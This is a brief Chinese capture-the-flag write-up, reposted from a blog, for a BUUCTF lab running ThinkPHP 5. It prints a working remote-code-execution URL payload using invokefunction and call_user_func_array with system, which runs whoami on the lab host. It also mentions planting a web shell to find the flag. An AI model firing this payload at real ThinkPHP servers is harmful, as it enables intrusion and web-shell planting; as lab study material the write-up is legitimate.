标签:index invokefunction vars 漏洞 代码执行 linux CVE
命令执行CVE
[ThinkPHP]5-Rce
打开题目发现是thinkphp5
thinkphp5有一个代码执行漏洞我们百度可以知道只要在?后面加上index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=(linux指令)我们就可以执行想执行的linux命令。
http://node4.buuoj.cn:28875/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
执行ls与find命令
发现找不到flag我们直接写一个shell进去(这里因为linux shell脚本 会过滤$_REQUEST的原因所以我们加上\来转义)
最后在phpinfo中发现了flag
标签:index,invokefunction,vars,漏洞,代码执行,linux,CVE 来源: https://www.cnblogs.com/linzexing/p/16247717.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。